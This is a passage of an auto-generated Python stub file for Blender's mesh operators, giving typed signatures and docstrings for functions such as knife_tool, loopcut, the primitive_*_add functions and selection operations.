'DIFFERENCE', use_swap: bool = False, threshold: float = 1e-06): '''Cut solid geometry from selected to unselected :param operation: Boolean :type operation: typing.Union[int, str] :param use_swap: Swap, Use with difference intersection to swap which side is kept :type use_swap: bool :param threshold: Merge threshold :type threshold: float ''' pass def knife_project(cut_through: bool = False): '''Use other objects outlines & boundaries to project knife cuts :param cut_through: Cut through, Cut through all faces, not just visible ones :type cut_through: bool ''' pass def knife_tool(use_occlude_geometry: bool = True, only_selected: bool = False, wait_for_input: bool = True): '''Cut new topology :param use_occlude_geometry: Occlude Geometry, Only cut the front most geometry :type use_occlude_geometry: bool :param only_selected: Only Selected, Only cut selected geometry :type only_selected: bool :param wait_for_input: Wait for Input :type wait_for_input: bool ''' pass def loop_multi_select(ring: bool = False): '''Select a loop of connected edges by connection type :param ring: Ring :type ring: bool ''' pass def loop_select(extend: bool = False, deselect: bool = False, toggle: bool = False, ring: bool = False): '''Select a loop of connected edges :param extend: Extend Select, Extend the selection :type extend: bool :param deselect: Deselect, Remove from the selection :type deselect: bool :param toggle: Toggle Select, Toggle the selection :type toggle: bool :param ring: Select Ring, Select ring :type ring: bool ''' pass def loop_to_region(select_bigger: bool = False): '''Select region of faces inside of a selected loop of edges :param select_bigger: Select Bigger, Select bigger regions instead of smaller ones :type select_bigger: bool ''' pass def loopcut(number_cuts: int = 1, smoothness: float = 0.0, falloff: typing.Union[int, str] = 'INVERSE_SQUARE', object_index: int = -1, edge_index: int = -1, mesh_select_mode_init=(False, False, False)): '''Add a new loop between existing loops :param number_cuts: Number of Cuts :type number_cuts: int :param smoothness: Smoothness, Smoothness factor :type smoothness: float :param falloff: Falloff, Falloff type the featherSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff. :type falloff: typing.Union[int, str] :param object_index: Object Index :type object_index: int :param edge_index: Edge Index :type edge_index: int ''' pass def loopcut_slide(MESH_OT_loopcut=None, TRANSFORM_OT_edge_slide=None): '''Cut mesh loop and slide it :param MESH_OT_loopcut: Loop Cut, Add a new loop between existing loops :param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh ''' pass def mark_freestyle_edge(clear: bool = False): '''(Un)mark selected edges as Freestyle feature edges :param clear: Clear :type clear: bool ''' pass def mark_freestyle_face(clear: bool = False): '''(Un)mark selected faces for exclusion from Freestyle feature edge detection :param clear: Clear :type clear: bool ''' pass def mark_seam(clear: bool = False): '''(Un)mark selected edges as a seam :param clear: Clear :type clear: bool ''' pass def mark_sharp(clear: bool = False, use_verts: bool = False): '''(Un)mark selected edges as sharp :param clear: Clear :type clear: bool :param use_verts: Vertices, Consider vertices instead of edges to select which edges to (un)tag as sharp :type use_verts: bool ''' pass def merge(type: typing.Union[int, str] = 'CENTER', uvs: bool = False): '''Merge selected vertices :param type: Type, Merge method to use :type type: typing.Union[int, str] :param uvs: UVs, Move UVs according to merge :type uvs: bool ''' pass def merge_normals(): '''Merge custom normals of selected vertices ''' pass def mod_weighted_strength(set: bool = False, face_strength: typing.Union[int, str] = 'MEDIUM'): '''Set/Get strength of face (used in Weighted Normal modifier) :param set: Set value, Set Value of faces :type set: bool :param face_strength: Face Strength, Strength to use for assigning or selecting face influence for weighted normal modifier :type face_strength: typing.Union[int, str] ''' pass def normals_make_consistent(inside: bool = False): '''Make face and vertex normals point either outside or inside the mesh :param inside: Inside :type inside: bool ''' pass def normals_tools(mode: typing.Union[int, str] = 'COPY', absolute: bool = False): '''Custom normals tools using Normal Vector of UI :param mode: Mode, Mode of tools taking input from InterfaceCOPY Copy Normal, Copy normal to buffer.PASTE Paste Normal, Paste normal from buffer.ADD Add Normal, Add normal vector with selection.MULTIPLY Multiply Normal, Multiply normal vector with selection.RESET Reset Normal, Reset buffer and/or normal of selected element. :type mode: typing.Union[int, str] :param absolute: Absolute Coordinates, Copy Absolute coordinates or Normal vector :type absolute: bool ''' pass def offset_edge_loops(use_cap_endpoint: bool = False): '''Create offset edge loop from the current selection :param use_cap_endpoint: Cap Endpoint, Extend loop around end-points :type use_cap_endpoint: bool ''' pass def offset_edge_loops_slide(MESH_OT_offset_edge_loops=None, TRANSFORM_OT_edge_slide=None): '''Offset edge loop slide :param MESH_OT_offset_edge_loops: Offset Edge Loop, Create offset edge loop from the current selection :param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh ''' pass def paint_mask_extract(mask_threshold: float = 0.5, add_boundary_loop: bool = True, smooth_iterations: int = 4, apply_shrinkwrap: bool = True, add_solidify: bool = True): '''Create a new mesh object from the current paint mask :param mask_threshold: Threshold, Minimum mask value to consider the vertex valid to extract a face from the original mesh :type mask_threshold: float :param add_boundary_loop: Add Boundary Loop, Add an extra edge loop to better preserve the shape when applying a subdivision surface modifier :type add_boundary_loop: bool :param smooth_iterations: Smooth Iterations, Smooth iterations applied to the extracted mesh :type smooth_iterations: int :param apply_shrinkwrap: Project to Sculpt, Project the extracted mesh into the original sculpt :type apply_shrinkwrap: bool :param add_solidify: Extract as Solid, Extract the mask as a solid object with a solidify modifier :type add_solidify: bool ''' pass def point_normals(mode: typing.Union[int, str] = 'COORDINATES', invert: bool = False, align: bool = False, target_location: float = (0.0, 0.0, 0.0), spherize: bool = False, spherize_strength: float = 0.1): '''Point selected custom normals to specified Target :param mode: Mode, How to define coordinates to point custom normals toCOORDINATES Coordinates, Use static coordinates (defined by various means).MOUSE Mouse, Follow mouse cursor. :type mode: typing.Union[int, str] :param invert: Invert, Invert affected normals :type invert: bool :param align: Align, Make all affected normals parallel :type align: bool :param target_location: Target, Target location to which normals will point :type target_location: float :param spherize: Spherize, Interpolate between original and new normals :type spherize: bool :param spherize_strength: Spherize Strength, Ratio of spherized normal to original normal :type spherize_strength: float ''' pass def poke(offset: float = 0.0, use_relative_offset: bool = False, center_mode: typing.Union[int, str] = 'MEDIAN_WEIGHTED'): '''Split a face into a fan :param offset: Poke Offset, Poke Offset :type offset: float :param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry :type use_relative_offset: bool :param center_mode: Poke Center, Poke Face Center CalculationMEDIAN_WEIGHTED Weighted Median, Weighted median face center.MEDIAN Median, Median face center.BOUNDS Bounds, Face bounds center. :type center_mode: typing.Union[int, str] ''' pass def polybuild_delete_at_cursor( mirror: bool = False, use_proportional_edit: bool = False, proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH', proportional_size: float = 1.0, use_proportional_connected: bool = False, use_proportional_projected: bool = False, release_confirm: bool = False, use_accurate: bool = False): '''Undocumented contribute <https://developer.blender.org/T51061> :param mirror: Mirror Editing :type mirror: bool :param use_proportional_edit: Proportional Editing :type use_proportional_edit: bool :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. :type proportional_edit_falloff: typing.Union[int, str] :param proportional_size: Proportional Size :type proportional_size: float :param use_proportional_connected: Connected :type use_proportional_connected: bool :param use_proportional_projected: Projected (2D) :type use_proportional_projected: bool :param release_confirm: Confirm on Release, Always confirm operation when releasing button :type release_confirm: bool :param use_accurate: Accurate, Use accurate transformation :type use_accurate: bool ''' pass def polybuild_dissolve_at_cursor(): '''Undocumented contribute <https://developer.blender.org/T51061> ''' pass def polybuild_extrude_at_cursor_move( MESH_OT_polybuild_transform_at_cursor=None, MESH_OT_extrude_edges_indiv=None, TRANSFORM_OT_translate=None): '''Undocumented contribute <https://developer.blender.org/T51061> :param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor :param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def polybuild_face_at_cursor( create_quads: bool = True, mirror: bool = False, use_proportional_edit: bool = False, proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH', proportional_size: float = 1.0, use_proportional_connected: bool = False, use_proportional_projected: bool = False, release_confirm: bool = False, use_accurate: bool = False): '''Undocumented contribute <https://developer.blender.org/T51061> :param create_quads: Create quads, Automatically split edges in triangles to maintain quad topology :type create_quads: bool :param mirror: Mirror Editing :type mirror: bool :param use_proportional_edit: Proportional Editing :type use_proportional_edit: bool :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. :type proportional_edit_falloff: typing.Union[int, str] :param proportional_size: Proportional Size :type proportional_size: float :param use_proportional_connected: Connected :type use_proportional_connected: bool :param use_proportional_projected: Projected (2D) :type use_proportional_projected: bool :param release_confirm: Confirm on Release, Always confirm operation when releasing button :type release_confirm: bool :param use_accurate: Accurate, Use accurate transformation :type use_accurate: bool ''' pass def polybuild_face_at_cursor_move(MESH_OT_polybuild_face_at_cursor=None, TRANSFORM_OT_translate=None): '''Undocumented contribute <https://developer.blender.org/T51061> :param MESH_OT_polybuild_face_at_cursor: Poly Build Face at Cursor :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def polybuild_split_at_cursor( mirror: bool = False, use_proportional_edit: bool = False, proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH', proportional_size: float = 1.0, use_proportional_connected: bool = False, use_proportional_projected: bool = False, release_confirm: bool = False, use_accurate: bool = False): '''Undocumented contribute <https://developer.blender.org/T51061> :param mirror: Mirror Editing :type mirror: bool :param use_proportional_edit: Proportional Editing :type use_proportional_edit: bool :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. :type proportional_edit_falloff: typing.Union[int, str] :param proportional_size: Proportional Size :type proportional_size: float :param use_proportional_connected: Connected :type use_proportional_connected: bool :param use_proportional_projected: Projected (2D) :type use_proportional_projected: bool :param release_confirm: Confirm on Release, Always confirm operation when releasing button :type release_confirm: bool :param use_accurate: Accurate, Use accurate transformation :type use_accurate: bool ''' pass def polybuild_split_at_cursor_move(MESH_OT_polybuild_split_at_cursor=None, TRANSFORM_OT_translate=None): '''Undocumented contribute <https://developer.blender.org/T51061> :param MESH_OT_polybuild_split_at_cursor: Poly Build Split at Cursor :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def polybuild_transform_at_cursor( mirror: bool = False, use_proportional_edit: bool = False, proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH', proportional_size: float = 1.0, use_proportional_connected: bool = False, use_proportional_projected: bool = False, release_confirm: bool = False, use_accurate: bool = False): '''Undocumented contribute <https://developer.blender.org/T51061> :param mirror: Mirror Editing :type mirror: bool :param use_proportional_edit: Proportional Editing :type use_proportional_edit: bool :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. :type proportional_edit_falloff: typing.Union[int, str] :param proportional_size: Proportional Size :type proportional_size: float :param use_proportional_connected: Connected :type use_proportional_connected: bool :param use_proportional_projected: Projected (2D) :type use_proportional_projected: bool :param release_confirm: Confirm on Release, Always confirm operation when releasing button :type release_confirm: bool :param use_accurate: Accurate, Use accurate transformation :type use_accurate: bool ''' pass def polybuild_transform_at_cursor_move( MESH_OT_polybuild_transform_at_cursor=None, TRANSFORM_OT_translate=None): '''Undocumented contribute <https://developer.blender.org/T51061> :param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def primitive_circle_add(vertices: int = 32, radius: float = 1.0, fill_type: typing.Union[int, str] = 'NOTHING', calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0)): '''Construct a circle mesh :param vertices: Vertices :type vertices: int :param radius: Radius :type radius: float :param fill_type: Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans. :type fill_type: typing.Union[int, str] :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float ''' pass def primitive_cone_add(vertices: int = 32, radius1: float = 1.0, radius2: float = 0.0, depth: float = 2.0, end_fill_type: typing.Union[int, str] = 'NGON', calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0)): '''Construct a conic mesh :param vertices: Vertices :type vertices: int :param radius1: Radius 1 :type radius1: float :param radius2: Radius 2 :type radius2: float :param depth: Depth :type depth: float :param end_fill_type: Base Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans. :type end_fill_type: typing.Union[int, str] :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float ''' pass def primitive_cube_add(size: float = 2.0, calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0)): '''Construct a cube mesh :param size: Size :type size: float :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float ''' pass def primitive_cube_add_gizmo( calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0), matrix: float = ((0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0))): '''Construct a cube mesh :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float :param matrix: Matrix :type matrix: float ''' pass def primitive_cylinder_add(vertices: int = 32, radius: float = 1.0, depth: float = 2.0, end_fill_type: typing.Union[int, str] = 'NGON', calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0)): '''Construct a cylinder mesh :param vertices: Vertices :type vertices: int :param radius: Radius :type radius: float :param depth: Depth :type depth: float :param end_fill_type: Cap Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans. :type end_fill_type: typing.Union[int, str] :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float ''' pass def primitive_grid_add(x_subdivisions: int = 10, y_subdivisions: int = 10, size: float = 2.0, calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0)): '''Construct a grid mesh :param x_subdivisions: X Subdivisions :type x_subdivisions: int :param y_subdivisions: Y Subdivisions :type y_subdivisions: int :param size: Size :type size: float :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float ''' pass def primitive_ico_sphere_add(subdivisions: int = 2, radius: float = 1.0, calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0)): '''Construct an Icosphere mesh :param subdivisions: Subdivisions :type subdivisions: int :param radius: Radius :type radius: float :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float ''' pass def primitive_monkey_add(size: float = 2.0, calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0)): '''Construct a Suzanne mesh :param size: Size :type size: float :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float ''' pass def primitive_plane_add(size: float = 2.0, calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0)): '''Construct a filled planar mesh with 4 vertices :param size: Size :type size: float :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float ''' pass def primitive_torus_add(align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0), major_segments: int = 48, minor_segments: int = 12, mode: typing.Union[int, str] = 'MAJOR_MINOR', major_radius: float = 1.0, minor_radius: float = 0.25, abso_major_rad: float = 1.25, abso_minor_rad: float = 0.75, generate_uvs: bool = True): '''Construct a torus mesh :param align: AlignWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location :type location: float :param rotation: Rotation :type rotation: float :param major_segments: Major Segments, Number of segments for the main ring of the torus :type major_segments: int :param minor_segments: Minor Segments, Number of segments for the minor ring of the torus :type minor_segments: int :param mode: Torus DimensionsMAJOR_MINOR Major/Minor, Use the major/minor radii for torus dimensions.EXT_INT Exterior/Interior, Use the exterior/interior radii for torus dimensions. :type mode: typing.Union[int, str] :param major_radius: Major Radius, Radius from the origin to the center of the cross sections :type major_radius: float :param minor_radius: Minor Radius, Radius of the torus’ cross section :type minor_radius: float :param abso_major_rad: Exterior Radius, Total Exterior Radius of the torus :type abso_major_rad: float :param abso_minor_rad: Interior Radius, Total Interior Radius of the torus :type abso_minor_rad: float :param generate_uvs: Generate UVs, Generate a default UV map :type generate_uvs: bool ''' pass def primitive_uv_sphere_add(segments: int = 32, ring_count: int = 16, radius: float = 1.0, calc_uvs: bool = True, enter_editmode: bool = False, align: typing.Union[int, str] = 'WORLD', location: float = (0.0, 0.0, 0.0), rotation: float = (0.0, 0.0, 0.0)): '''Construct a UV sphere mesh :param segments: Segments :type segments: int :param ring_count: Rings :type ring_count: int :param radius: Radius :type radius: float :param calc_uvs: Generate UVs, Generate a default UV map :type calc_uvs: bool :param enter_editmode: Enter Editmode, Enter editmode when adding this object :type enter_editmode: bool :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. :type align: typing.Union[int, str] :param location: Location, Location for the newly added object :type location: float :param rotation: Rotation, Rotation for the newly added object :type rotation: float ''' pass def quads_convert_to_tris(quad_method: typing.Union[int, str] = 'BEAUTY', ngon_method: typing.Union[int, str] = 'BEAUTY'): '''Triangulate selected faces :param quad_method: Quad Method, Method for splitting the quads into trianglesBEAUTY Beauty , Split the quads in nice triangles, slower method.FIXED Fixed, Split the quads on the first and third vertices.FIXED_ALTERNATE Fixed Alternate, Split the quads on the 2nd and 4th vertices.SHORTEST_DIAGONAL Shortest Diagonal, Split the quads based on the distance between the vertices. :type quad_method: typing.Union[int, str] :param ngon_method: Polygon Method, Method for splitting the polygons into trianglesBEAUTY Beauty, Arrange the new triangles evenly (slow).CLIP Clip, Split the polygons with an ear clipping algorithm. :type ngon_method: typing.Union[int, str] ''' pass def region_to_loop(): '''Select boundary edges around the selected faces ''' pass def remove_doubles(threshold: float = 0.0001, use_unselected: bool = False): '''Merge vertices based on their proximity :param threshold: Merge Distance, Maximum distance between elements to merge :type threshold: float :param use_unselected: Unselected, Merge selected to other unselected vertices :type use_unselected: bool ''' pass def reveal(select: bool = True): '''Reveal all hidden vertices, edges and faces :param select: Select :type select: bool ''' pass def rip(mirror: bool = False, use_proportional_edit: bool = False, proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH', proportional_size: float = 1.0, use_proportional_connected: bool = False, use_proportional_projected: bool = False, release_confirm: bool = False, use_accurate: bool = False, use_fill: bool = False): '''Disconnect vertex or edges from connected geometry :param mirror: Mirror Editing :type mirror: bool :param use_proportional_edit: Proportional Editing :type use_proportional_edit: bool :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. :type proportional_edit_falloff: typing.Union[int, str] :param proportional_size: Proportional Size :type proportional_size: float :param use_proportional_connected: Connected :type use_proportional_connected: bool :param use_proportional_projected: Projected (2D) :type use_proportional_projected: bool :param release_confirm: Confirm on Release, Always confirm operation when releasing button :type release_confirm: bool :param use_accurate: Accurate, Use accurate transformation :type use_accurate: bool :param use_fill: Fill, Fill the ripped region :type use_fill: bool ''' pass def rip_edge(mirror: bool = False, use_proportional_edit: bool = False, proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH', proportional_size: float = 1.0, use_proportional_connected: bool = False, use_proportional_projected: bool = False, release_confirm: bool = False, use_accurate: bool = False): '''Extend vertices along the edge closest to the cursor :param mirror: Mirror Editing :type mirror: bool :param use_proportional_edit: Proportional Editing :type use_proportional_edit: bool :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. :type proportional_edit_falloff: typing.Union[int, str] :param proportional_size: Proportional Size :type proportional_size: float :param use_proportional_connected: Connected :type use_proportional_connected: bool :param use_proportional_projected: Projected (2D) :type use_proportional_projected: bool :param release_confirm: Confirm on Release, Always confirm operation when releasing button :type release_confirm: bool :param use_accurate: Accurate, Use accurate transformation :type use_accurate: bool ''' pass def rip_edge_move(MESH_OT_rip_edge=None, TRANSFORM_OT_translate=None): '''Extend vertices and move the result :param MESH_OT_rip_edge: Extend Vertices, Extend vertices along the edge closest to the cursor :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def rip_move(MESH_OT_rip=None, TRANSFORM_OT_translate=None): '''Rip polygons and move the result :param MESH_OT_rip: Rip, Disconnect vertex or edges from connected geometry :param TRANSFORM_OT_translate: Move, Move selected items ''' pass def screw(steps: int = 9, turns: int = 1, center: float = (0.0, 0.0, 0.0), axis: float = (0.0, 0.0, 0.0)): '''Extrude selected vertices in screw-shaped rotation around the cursor in indicated viewport :param steps: Steps, Steps :type steps: int :param turns: Turns, Turns :type turns: int :param center: Center, Center in global view space :type center: float :param axis: Axis, Axis in global view space :type axis: float ''' pass def select_all(action: typing.Union[int, str] = 'TOGGLE'): '''(De)select all vertices, edges or faces :param action: Action, Selection action to executeTOGGLE Toggle, Toggle selection for all elements.SELECT Select, Select all elements.DESELECT Deselect, Deselect all elements.INVERT Invert, Invert selection of all elements. :type action: typing.Union[int, str] ''' pass def select_axis(orientation: typing.Union[int, str] = 'LOCAL', sign: typing.Union[int, str] = 'POS', axis: typing.Union[int, str] = 'X', threshold: float = 0.0001): '''Select all data in the mesh on a single axis :param orientation: Axis Mode, Axis orientationGLOBAL Global, Align the transformation axes to world space.LOCAL Local, Align the transformation axes to the selected objects’ local space.NORMAL Normal, Align the transformation axes to average normal of selected elements (bone Y axis for pose mode).GIMBAL Gimbal, Align each axis to the Euler rotation axis as used for input.VIEW View, Align the transformation axes to the window.CURSOR Cursor, Align the transformation axes to the 3D cursor. :type orientation: typing.Union[int, str] :param sign: Axis Sign, Side to select :type sign: typing.Union[int, str] :param axis: Axis, Select the axis to compare each vertex on :type axis: typing.Union[int, str] :param threshold: Threshold :type threshold: float ''' pass def select_face_by_sides(number: int = 4, type: typing.Union[int, str] = 'EQUAL', extend: bool = True): '''Select vertices or faces by the number of polygon sides :param number: Number of Vertices :type number: int :param type: Type, Type of comparison to make :type type: typing.Union[int, str] :param extend: Extend, Extend the selection :type extend: bool ''' pass def select_interior_faces(): '''Select faces where all edges have more than 2 face users ''' pass def select_less(use_face_step: bool = True): '''Deselect vertices, edges or faces at the boundary of each selection region :param use_face_step: Face Step, Connected faces (instead of edges) :type use_face_step: bool ''' pass def select_linked(delimit: typing.Set[typing.Union[int, str]] = {'SEAM'}): '''Select all vertices connected to the current selection :param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates. :type delimit: typing.Set[typing.Union[int, str]] ''' pass def select_linked_pick(deselect: bool = False, delimit: typing.Set[typing.Union[int, str]] = {'SEAM'}, index=-1): '''(De)select all vertices linked to the edge under the mouse cursor :param deselect: Deselect :type deselect: bool :param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates. :type delimit: typing.Set[typing.Union[int, str]] ''' pass def select_loose(extend: bool = False): '''Select loose geometry based on the selection mode :param extend: Extend, Extend the selection :type extend: bool ''' pass def select_mirror(axis: typing.Set[typing.Union[int, str]] = {'X'}, extend: bool = False): '''Select mesh items at mirrored locations :param axis: Axis :type axis: typing.Set[typing.Union[int, str]] :param extend: Extend, Extend the existing selection :type extend: bool ''' pass def select_mode(use_extend: bool = False, use_expand: bool = False, type: typing.Union[int, str] = 'VERT', action: typing.Union[int, str] = 'TOGGLE'): '''Change selection mode :param use_extend: Extend :type use_extend: bool :param use_expand: Expand :type use_expand: bool :param type: TypeVERT Vertex, Vertex selection mode.EDGE Edge, Edge selection mode.FACE Face, Face selection mode. :type type: typing.Union[int, str] :param action: Action, Selection action to executeDISABLE Disable, Disable selected markers.ENABLE Enable, Enable selected markers.TOGGLE Toggle, Toggle disabled flag for selected markers. :type action: typing.Union[int, str] ''' pass def select_more(use_face_step: bool = True): '''Select more vertices, edges or faces connected to initial selection :param use_face_step: Face Step, Connected faces (instead of edges) :type use_face_step: bool ''' pass def select_next_item(): '''Select the next element (using selection order) ''' pass def select_non_manifold(extend: bool = True, use_wire: bool = True, use_boundary: bool = True, use_multi_face: bool = True, 